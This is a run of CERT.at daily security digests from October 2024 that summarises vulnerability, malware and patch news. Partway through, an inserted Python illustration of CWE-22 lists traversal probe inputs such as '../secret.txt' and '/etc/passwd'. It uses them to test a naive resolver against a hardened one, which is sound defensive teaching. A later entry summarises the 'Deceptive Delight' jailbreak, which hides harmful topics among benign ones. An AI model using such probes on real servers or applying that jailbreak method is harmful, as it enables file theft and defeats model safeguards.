Discover insights from a multi-year APT campaign that exploited network perimeter vulnerabilities to target high-value entities, revealing critical gaps in edge device security.
---------------------------------------------
https://www.greynoise.io/blog/the-persistent-perimeter-threat-strategic-ins…
∗∗∗ Auditing K3s Clusters ∗∗∗
---------------------------------------------
K3s shares a great deal with standard Kubernetes, but its lightweight implementation comes with some challenges and opportunities in the security sphere.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/auditing-k3s-clusters/
=====================
= Vulnerabilities =
=====================
∗∗∗ LiteSpeed Cache WordPress plugin bug lets hackers get admin access ∗∗∗
---------------------------------------------
The free version of the popular WordPress plugin LiteSpeed Cache has fixed a dangerous privilege elevation flaw on its latest release that could allow unauthenticated site visitors to gain admin rights. [..] The newly discovered high-severity flaw tracked as CVE-2024-50550 is caused by a weak hash check in the plugin's "role simulation" feature, designed to simulate user roles to aid the crawler in site scans from different user levels.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/litespeed-cache-wordpress-pl…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr and openssl), Fedora (firefox, libarchive, micropython, NetworkManager-libreswan, and xorg-x11-server-Xwayland), Red Hat (nano), Slackware (mozilla-firefox, mozilla-thunderbird, tigervnc, and xorg), SUSE (389-ds, Botan, go1.21-openssl, govulncheck-vulndb, java-11-openjdk, lxc, python-Werkzeug, and uwsgi), and Ubuntu (firefox, libarchive, linux-azure-fde, linux-azure-fde-5.15, python-pip, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04).
---------------------------------------------
https://lwn.net/Articles/996526/
∗∗∗ Drupal: Cookiebot + GTM - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-055 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-055
∗∗∗ Bosch: DoS vulnerability on IndraDrive ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-315415.html
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 29-10-2024 18:00 − Wednesday 30-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hackers steal 15,000 cloud credentials from exposed Git config files ∗∗∗
---------------------------------------------
A global large-scale operation dubbed "EmeraldWhale" exploited misconfigured Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-c…
∗∗∗ Jumpy Pisces Engages in Play Ransomware ∗∗∗
---------------------------------------------
Jumpy Pisces, also known as Andariel and Onyx Sleet, was historically involved in cyberespionage, financial crime and ransomware attacks. [..] We expect their attacks will increasingly target a wide range of victims globally. Network defenders should view Jumpy Pisces activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance.
---------------------------------------------
https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomwa…
∗∗∗ Writing a BugSleep C2 server and detecting its traffic with Snort ∗∗∗
---------------------------------------------
In June 2024, security researchers published their analysis of a novel implant dubbed “MuddyRot”(aka "BugSleep"). [..] This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort.
---------------------------------------------
https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/
∗∗∗ Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack ∗∗∗
---------------------------------------------
Cryptocurrency enthusiasts have been the target of another sophisticated and invasive malware campaign. This campaign was orchestrated through multiple attack vectors, including a malicious Python package named “cryptoaitools” on PyPI and deceptive GitHub repositories. This multi-stage malware, masquerading as a suite of cryptocurrency trading tools, aims to steal a wide range of sensitive data and drain victims’ crypto wallets.
---------------------------------------------
https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vec…
∗∗∗ New “Scary” FakeCall Malware Captures Photos and OTPs on Android ∗∗∗
---------------------------------------------
A new, more sophisticated variant of the FakeCall malware is targeting Android devices. [..] The FakeCall malware typically infiltrates a device through a malicious app downloaded from a compromised website or a phishing email. The app requests permission to become the default call handler. If granted, the malware gains extensive privileges.
---------------------------------------------
https://hackread.com/scary-fakecall-malware-captures-photos-otps-android/
=====================
= Vulnerabilities =
=====================
∗∗∗ After Pwn2Own: QNAP and Synology patch exploited NAS vulnerabilities ∗∗∗
---------------------------------------------
For the TrueNAS vulnerabilities exploited at Pwn2Own there appear to be no patches yet, but there is guidance on how users can protect their systems against possible attacks. [..] Initial patches are available from Synology, for example. On October 25 the company already released updates for Beephotos for Beestation OS 1.0 and 1.1 as well as Synology Photos 1.7 and 1.6 for DSM 7.2. Each of these closes a critical security vulnerability that allows attackers to execute malicious code remotely.
---------------------------------------------
https://www.golem.de/news/nach-pwn2own-qnap-und-synology-patchen-ausgenutzt…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (buildah), Debian (python-git, texlive-bin, and xorg-server), Mageia (chromium-browser-stable), Red Hat (kernel), SUSE (Botan, go1.22-openssl, go1.23-openssl, grafana, libgsf, pcp, pgadmin4, python310-pytest-html, python313, xorg-x11-server, and xwayland), and Ubuntu (nano, python-urllib3, and xorg-server, xwayland).
---------------------------------------------
https://lwn.net/Articles/996310/
∗∗∗ QNAP: Vulnerability in SMB Service (PWN2OWN 2024) ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-42
∗∗∗ SPLUNK: SVD-2024-1015: Third-Party Package Updates in the Splunk Add-on for Cisco Meraki - October 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1015
∗∗∗ SPLUNK: SVD-2024-1014: Third-Party Package Updates in the Splunk Add-on for Google Cloud Platform - October 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1014
∗∗∗ Ping Identity PingIDM: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/query-filter-injectio…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 28-10-2024 18:00 − Tuesday 29-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New tool bypasses Google Chrome’s new cookie encryption system ∗∗∗
---------------------------------------------
A researcher has released a tool to bypass Google's new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chr…
∗∗∗ Exchange Online: Inbound SMTP DANE with DNSSEC available ∗∗∗
---------------------------------------------
Microsoft has made Inbound SMTP DANE with DNSSEC for Exchange Online generally available, after it had already been available as a preview in July 2024. The new feature Inbound SMTP DANE with DNSSEC in Exchange Online is intended to increase the security of e-mail communication by supporting two security standards.
---------------------------------------------
https://www.borncity.com/blog/2024/10/29/exchange-online-inbound-smtp-dane-…
∗∗∗ Ransomware attacks on Sonicwall SSL VPNs ∗∗∗
---------------------------------------------
IT researchers have investigated attacks on Sonicwall SSL VPNs and discovered ransomware activity by Akira and Fog. [..] The Sonicwall devices through which the perpetrators were able to break in were all unpatched against the vulnerability CVE-2024-40766; with a CVSS score of 9.3 it is considered a critical risk. In early September Sonicwall warned that this vulnerability in the SSL VPNs was already being actively attacked and once again pointed to the available updates that close the security hole.
---------------------------------------------
https://heise.de/-9998068
∗∗∗ New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors ∗∗∗
---------------------------------------------
More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks. [..] The attack has been described as the first, practical "end-to-end cross-process Spectre leak."
---------------------------------------------
https://thehackernews.com/2024/10/new-research-reveals-spectre.html
∗∗∗ What Are My OPTIONS? CyberPanel v2.3.6 pre-auth RCE ∗∗∗
---------------------------------------------
A few months ago I was assigned to do a pentest on a target running CyberPanel. It seemed to be installed by default by some VPS providers & it was also sponsored by Freshworks. [..] if you’re a beginner with a creative mind looking to get started with code review, I definitely recommend you read this blog.
---------------------------------------------
https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v2…
∗∗∗ Beware of this Instagram message: "I need your help" ∗∗∗
---------------------------------------------
"I need your help," writes a well-known person or a friend on Instagram. The person asks you to vote for them in a poll and sends you a link. Caution: it is a scam!
---------------------------------------------
https://www.watchlist-internet.at/news/instagram-nachricht-hilfe/
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP: Vulnerability in HBS 3 Hybrid Backup Sync (PWN2OWN 2024) ∗∗∗
---------------------------------------------
An OS command injection vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. Critical, CVE-2024-50388
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-41
∗∗∗ Spring: Authorization Bypass of Static Resources in WebFlux Applications ∗∗∗
---------------------------------------------
Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. CRITICAL, CVE-2024-38821
---------------------------------------------
https://spring.io/security/cve-2024-38821/
∗∗∗ Also available: updates for iOS 17, macOS 14 and macOS 13, with security fixes ∗∗∗
---------------------------------------------
In addition to iOS 18.1, iPadOS 18.1 and macOS 15.1, Apple has also released updates for older operating systems. They fix security issues only.
---------------------------------------------
https://heise.de/-9997116
∗∗∗ Mozilla Security Advisories October 29, 2024 ∗∗∗
---------------------------------------------
Thunderbird 132, Thunderbird 128.4, Firefox ESR 115.17, Firefox ESR 128.4 and Firefox 132.
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (exim4) and SUSE (chromium, openssl-1_1, and openssl-3).
---------------------------------------------
https://lwn.net/Articles/996196/
∗∗∗ 0patch: We Patched CVE-2024-38030, Found Another Windows Themes Spoofing Vulnerability (0day) ∗∗∗
---------------------------------------------
https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html
∗∗∗ OneDev Security Update Advisory (CVE-2024-45309) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/84118/
∗∗∗ Solar-Log Base 15 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-02
∗∗∗ Delta Electronics InfraSuite Device Master ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-03
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 25-10-2024 18:00 − Monday 28-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Amazon seizes domains used in rogue Remote Desktop campaign to steal data ∗∗∗
---------------------------------------------
Amazon has seized domains used by the Russian APT29 hacking group in targeted attacks against government and military organizations to steal Windows credentials and data using malicious Remote Desktop Protocol connection files.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-i…
∗∗∗ Redline, Meta infostealer malware operations seized by police ∗∗∗
---------------------------------------------
The Dutch National Police seized the network infrastructure for the Redline and Meta infostealer malware operations in "Operation Magnus," warning cybercriminals that their data is now in the hands of the law enforcement.
---------------------------------------------
https://www.bleepingcomputer.com/news/legal/redline-meta-infostealer-malwar…
∗∗∗ 70 zero-days exploited: Pwn2Own hackers crack Samsung Galaxy S24 and more ∗∗∗
---------------------------------------------
Various cameras, printers and NAS systems were also attacked during the contest. Nobody dared to take on a Pixel 8 or iPhone 15.
---------------------------------------------
https://www.golem.de/news/70-zero-day-luecken-ausgenutzt-pwn2own-hacker-kna…
∗∗∗ The Windows Registry Adventure #4: Hives and the registry layout ∗∗∗
---------------------------------------------
To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry ..
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventu…
∗∗∗ Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining ∗∗∗
---------------------------------------------
The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third parties. "The group is currently ..
---------------------------------------------
https://thehackernews.com/2024/10/notorious-hacker-group-teamtnt-launches.h…
∗∗∗ Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russia or China ∗∗∗
---------------------------------------------
A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers.
---------------------------------------------
https://www.wired.com/story/cybercriminals-disruptive-hacking-us-elections-…
∗∗∗ Vulnerabilities of Realtek SD card reader driver, part 1 ∗∗∗
---------------------------------------------
These vulnerabilities enable non-privileged users to leak the contents of kernel pool and kernel stack, write to arbitrary kernel memory, and, the most interesting, read and write physical memory from user mode via the DMA capability of the device. The vulnerabilities have remained undisclosed for years, affecting many OEMs, including Dell, ..
---------------------------------------------
https://zwclose.github.io/2024/10/14/rtsper1.html
∗∗∗ Inside the Open Directory of the “You Dun” Threat Group ∗∗∗
---------------------------------------------
The DFIR Report’s Threat Intel Team detected an open directory in January 2024 and analyzed it for tradecraft and threat actor activity. Once reviewed, we identified it was related to the Chinese-speaking hacking group that calls itself “You Dun” ..
---------------------------------------------
https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-d…
∗∗∗ The NSA recommends a weekly smartphone reboot ∗∗∗
---------------------------------------------
An interesting piece of information I came across this week. The US security agency NSA (National Security Agency, domestic intelligence service) recommends restarting your smartphone once a week. There is a security rationale behind this. The restart is meant to remove malware that is not persistent ..
---------------------------------------------
https://www.borncity.com/blog/2024/10/27/die-nsa-empfiehlt-woechentliches-s…
∗∗∗ Anatomy of an LLM RCE ∗∗∗
---------------------------------------------
As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a ..
---------------------------------------------
https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-r…
∗∗∗ Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives ∗∗∗
---------------------------------------------
In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". "Civil Defense" claims to be a provider of free ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-…
∗∗∗ Secure Coding: Preventing unauthorized access through path traversal (CWE-22) ∗∗∗
---------------------------------------------
CWE-22 describes the improper limitation of a pathname to a restricted directory. How can the weakness be brought under control?
---------------------------------------------
https://heise.de/-9982270
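As an added illustration of the CWE-22 pattern and its fix (example code written for this digest, not taken from the heise article): the naive resolver joins the request path onto the document root and checks the result with a string prefix, which is the bug; the hardened resolver canonicalizes both sides and requires the root to be an ancestor of the resolved target. The demo builds a throwaway directory tree with a sibling directory and a symlink (a constructed sample, assuming a POSIX filesystem where symlinks can be created) and records which probe paths each resolver lets through.

```python
import os
import shutil
import tempfile
from pathlib import Path


def resolve_naively(base: str, user_path: str) -> str:
    """The CWE-22 anti-pattern: join the user's path onto the document root and
    check the result with a string prefix test. '..' segments are never
    normalized, a symlink inside the root is followed wherever it points, and
    the prefix test accepts sibling directories such as '<base>_old'."""
    candidate = os.path.join(base, user_path)
    if not candidate.startswith(base):
        raise PermissionError(user_path)
    return candidate


def resolve_safely(base: str, user_path: str) -> Path:
    """Hardened variant: canonicalize both the root and the joined path (this
    follows symlinks and collapses '..'), then require the canonical root to be
    an ancestor of the canonical candidate. Joining already discards the root
    when user_path is absolute, so that case fails the same ancestor test."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    root = Path(base).resolve()
    candidate = (root / user_path).resolve()  # non-strict: target need not exist
    if os.path.commonpath([root, candidate]) != str(root):
        raise PermissionError(f"path escapes {root}: {user_path!r}")
    return candidate


def _accepts(resolver, base: str, user_path: str) -> bool:
    """True when the resolver returns a path, False when it refuses."""
    try:
        resolver(base, user_path)
        return True
    except (PermissionError, ValueError):
        return False


PROBE_PATHS = [
    "index.html",          # legitimate request
    "../secret.txt",       # classic dot-dot escape
    "/etc/passwd",         # absolute path replaces the root when joined
    "../public_old/x",     # sibling directory that shares the root's prefix
    "escape/secret.txt",   # symlink inside the root pointing above it
]


def demo() -> dict:
    """Build a throwaway directory tree (a constructed sample, not from the
    article) and record which probe paths each resolver accepts."""
    tmp = Path(tempfile.mkdtemp())
    try:
        public = tmp / "public"
        public.mkdir()
        (tmp / "public_old").mkdir()
        (public / "index.html").write_text("ok")
        (tmp / "secret.txt").write_text("not for the web")
        (public / "escape").symlink_to(tmp)  # POSIX symlink, assumed available
        base = str(public)  # no trailing slash, as commonly written
        return {
            "naive": {p: _accepts(resolve_naively, base, p) for p in PROBE_PATHS},
            "safe": {p: _accepts(resolve_safely, base, p) for p in PROBE_PATHS},
        }
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for name, results in demo().items():
        print(name, results)
```

The naive resolver only stops the absolute-path probe; the dot-dot escape, the sibling-directory prefix trick and the symlink all pass its prefix check. Resolving first and then comparing canonical paths with `os.path.commonpath` closes all four holes with one test.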
∗∗∗ Black Basta group uses Microsoft Teams chat function ∗∗∗
---------------------------------------------
The ransomware group known as "Black Basta" has developed a new mechanism that abuses the Microsoft Teams chat function to make contact with victims.
---------------------------------------------
https://heise.de/-9995322
∗∗∗ Nvidia: Privilege escalation possible through security vulnerabilities in graphics driver ∗∗∗
---------------------------------------------
Nvidia warns of several security vulnerabilities in its graphics drivers that, among other things, allow privilege escalation. Updates are available.
---------------------------------------------
https://heise.de/-9995842
∗∗∗ 2024 situation report: Malware installed almost 8 million times from Google Play ∗∗∗
---------------------------------------------
IT researchers have examined the mobile malware situation of the past 12 months. More than 200 counterfeit apps lurked in Google Play.
---------------------------------------------
https://heise.de/-9996456
∗∗∗ VMware Tanzu Spring Security: Bypass of authorization rules possible ∗∗∗
---------------------------------------------
VMware Tanzu Spring Security has a critical security vulnerability that allows attackers to bypass authorization rules.
---------------------------------------------
https://heise.de/-9996582
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, python3.12, and python3.9), Debian (activemq, chromium, libheif, nss, and twisted), Fedora (chromium, dnsdist, dotnet8.0, edk2, glibc, libdigidocpp, mbedtls3.6, NetworkManager-libreswan, oath-toolkit, podman-tui, prometheus-podman-exporter, python-fastapi, python-openapi-core, ..
---------------------------------------------
https://lwn.net/Articles/996085/
∗∗∗ Chatwork Desktop Application (Windows) uses a potentially dangerous function ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN78335885/
∗∗∗ K000148252: Python tarfile vulnerability CVE-2024-6232 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148252
∗∗∗ K000148256: libarchive vulnerability CVE-2018-1000880 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148256
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 24-10-2024 18:00 − Friday 25-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Denial of Service in Cisco ASA & FTD and further Cisco advisories ∗∗∗
---------------------------------------------
In a recently published advisory, Cisco reports being aware of "malicious use" of a denial-of-service vulnerability in the Cisco Adaptive Security Appliance & Firepower Threat Defense Software Remote Access VPN. According to reports, however, these are not targeted denial-of-service attacks but side effects of broadly distributed brute-force or credential-spraying attacks.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/10/denial-of-service-in-cisco-asa-ftd…
∗∗∗ Object-oriented and less redundant: The BSI presents IT-Grundschutz++ ∗∗∗
---------------------------------------------
The BSI has set itself the goal of making IT-Grundschutz more user-friendly. To that end it relies on machine readability and leaner documentation.
---------------------------------------------
https://heise.de/-9994010
∗∗∗ AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances. [..] Following responsible disclosure on June 27, 2024, the issue was addressed by the project maintainers in CDK version 2.149.0 released in July.
---------------------------------------------
https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.h…
∗∗∗ NotLockBit: ransomware discovery serves as wake-up call for Mac users ∗∗∗
---------------------------------------------
Historically, Mac users haven't had to worry about malware as much as their Windows-using cousins. But that doesn't mean that Mac users should be complacent. And the recent discovery of a new malware strain emphasises that the threat - even if much smaller than on Windows - remains real.
---------------------------------------------
https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery…
∗∗∗ Embargo ransomware: Rock’n’Rust ∗∗∗
---------------------------------------------
Novice ransomware group Embargo is testing and deploying a new Rust-based toolkit.
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrus…
∗∗∗ From crisis to confidence: How the University of Rijeka used a network breach to reboot their cybersecurity ∗∗∗
---------------------------------------------
How would your institution respond if a seemingly ordinary system check uncovered a major security incident? That’s exactly what the University of Rijeka faced when a member of the IT team discovered an unauthorised virtual machine template during a routine check — just as a new academic year began.
---------------------------------------------
https://connect.geant.org/2024/10/25/from-crisis-to-confidence-how-the-univ…
∗∗∗ Modern data harvesters: Smart TVs even track HDMI content ∗∗∗
---------------------------------------------
Smart TVs analyze screen content even when an HDMI source is used. The analyses serve targeted advertising.
---------------------------------------------
https://heise.de/-9994787
∗∗∗ Vonovia under criticism: Smart smoke detectors carry a risk of spying ∗∗∗
---------------------------------------------
The smoke detectors collect all kinds of information about air quality and send it over the internet - a welcome trove of data for criminals. [..] Vonovia itself supposedly processes the data only in anonymized form.
---------------------------------------------
https://www.golem.de/news/vonovia-in-der-kritik-smarte-rauchmelder-bergen-r…
=====================
= Vulnerabilities =
=====================
NTR
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 23-10-2024 18:00 − Thursday 24-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New Qilin ransomware encryptor features stronger encryption, evasion ∗∗∗
---------------------------------------------
A new Rust-based variant of the Qilin (Agenda) ransomware strain, dubbed Qilin.B, has been spotted in the wild, featuring stronger encryption, better evasion from security tools, and the ability to disrupt data recovery mechanisms.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-qilin-ransomware-encrypt…
∗∗∗ New OpenSSL vulnerability is dangerous but very hard to exploit ∗∗∗
---------------------------------------------
While SUSE and the BSI see a high risk, the OpenSSL project points to extensive preconditions for an exploit. For now there are no updates. [..] They rated the risk of the vulnerability with CVE ID CVE-2024-9143 as low because the bug is difficult to exploit.
---------------------------------------------
https://heise.de/-9992067
∗∗∗ Location tracking of phones is out of control. Here’s how to fight back. ∗∗∗
---------------------------------------------
Unique IDs assigned to Android and iOS devices threaten your privacy. Who knew? You likely have never heard of Babel Street or Location X, but chances are good that they know a lot about you and anyone else you know who keeps a phone nearby around the clock.
---------------------------------------------
https://arstechnica.com/information-technology/2024/10/phone-tracking-tool-…
∗∗∗ Investigating volatile data with advanced memory forensics tools – part 1 ∗∗∗
---------------------------------------------
In this two-post series I want to highlight how memory forensics plays a crucial role in enhancing forensic investigations, specifically by providing access to volatile data that cannot be retrieved from storage devices like hard drives.
---------------------------------------------
https://www.pentestpartners.com/security-blog/investigating-volatile-data-w…
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical zero-day vulnerability in FortiManager is being actively exploited - update available ∗∗∗
---------------------------------------------
A critical security vulnerability has been discovered in FortiManager that is already being actively exploited by attackers. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code or commands. CVE-2024-47575, CVSS Base Score: 9.8
---------------------------------------------
https://www.cert.at/de/warnungen/2024/10/kritische-zero-day-schwachstelle-i…
∗∗∗ Cisco reports more than 35 security vulnerabilities in firewall products ∗∗∗
---------------------------------------------
Cisco's ASA, Firepower and Secure Firewall Management Center contain security vulnerabilities, some of them critical. Updates now available close more than 35 of them. [..] Three of the advisories cover vulnerabilities rated critical, eleven cover high-risk ones, 21 cover vulnerabilities rated medium, and one further advisory is informational without a risk rating.
---------------------------------------------
https://heise.de/-9992639
∗∗∗ Drupal Security Advisories 2024-10-23 ∗∗∗
---------------------------------------------
Drupal released 5 security advisories. (1 Critical, 3 Moderately Critical, 1 Less Critical)
---------------------------------------------
https://www.drupal.org/security
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (grafana, NetworkManager-libreswan, python3.11, and python39:3.9 and python39-devel:3.9), Fedora (dotnet6.0, koji, python-fastapi, python-openapi-core, python-platformio, python-starlette, rust-pyo3, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros, rust-pyo3-macros-backend, and yarnpkg), Oracle (grafana, kernel, linux-firmware, NetworkManager-libreswan, and python3.11), Slackware (php81), and SUSE (apache2, buildah, cups-filters, go1.21-openssl, podman, postgresql16, python-pyOpenSSL, and webkit2gtk3).
---------------------------------------------
https://lwn.net/Articles/995550/
∗∗∗ VU#123336: Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/123336
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (October 14, 2024 to October 20, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr…
∗∗∗ Unauthenticated path traversal vulnerability in Lawo AG vsm LTC Time Sync (vTimeSync) ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/unauthenticated-path-…
∗∗∗ iniNet Solutions SpiderControl SCADA PC HMI Editor ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02
∗∗∗ VIMESA VHF/FM Transmitter Blue Plus ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-01
∗∗∗ Deep Sea Electronics DSE855 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-03
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 22-10-2024 18:00 − Wednesday 23-10-2024 18:00
Handler: Thomas Pribitzer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Exploit released for new Windows Server "WinReg" NTLM Relay attack ∗∗∗
---------------------------------------------
Proof-of-concept exploit code is now public for a vulnerability in Microsoft's Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-released-for-new-win…
∗∗∗ Hackers exploit 52 zero-days on the first day of Pwn2Own Ireland ∗∗∗
---------------------------------------------
On the first day of Pwn2Own Ireland, participants demonstrated 52 zero-day vulnerabilities across a range of devices, earning a total of $486,250 in cash prizes.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-52-zero-days…
∗∗∗ Fortinet warns of new critical FortiManager flaw used in zero-day attacks ∗∗∗
---------------------------------------------
Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critic…
∗∗∗ Android and iOS: Hard-coded cloud credentials discovered in popular apps ∗∗∗
---------------------------------------------
Several apps, some with millions of downloads, are affected. According to the discoverers, this endangers not only backend services but also user data.
---------------------------------------------
https://www.golem.de/news/android-und-ios-fest-codierte-cloud-zugangsdaten-…
∗∗∗ Grandoreiro, the global trojan with grandiose ambitions ∗∗∗
---------------------------------------------
In this report, Kaspersky experts analyze recent Grandoreiro campaigns, new targets, tricks, and banking trojan versions.
---------------------------------------------
https://securelist.com/grandoreiro-banking-trojan/114257/
∗∗∗ The Crypto Game of Lazarus APT: Investors vs. Zero-days ∗∗∗
---------------------------------------------
Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
---------------------------------------------
https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/
∗∗∗ CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) ∗∗∗
---------------------------------------------
A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active ..
---------------------------------------------
https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html
∗∗∗ Warning, fake shop: sparhimmel24.de ∗∗∗
---------------------------------------------
sparhimmel24.de is a fraudulent online shop that lures you into a trap with supposed bargains. Orders are not delivered despite payment. We show you how to recognize fake shops and protect yourself from fraud.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-fake-shop-sparhimmel24de
∗∗∗ Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction ∗∗∗
---------------------------------------------
We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate.
---------------------------------------------
https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distr…
∗∗∗ Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs ∗∗∗
---------------------------------------------
Did you know there’s widespread exploitation of FortiNet products going on using a zero day, and that there’s no CVE? Now you do.
---------------------------------------------
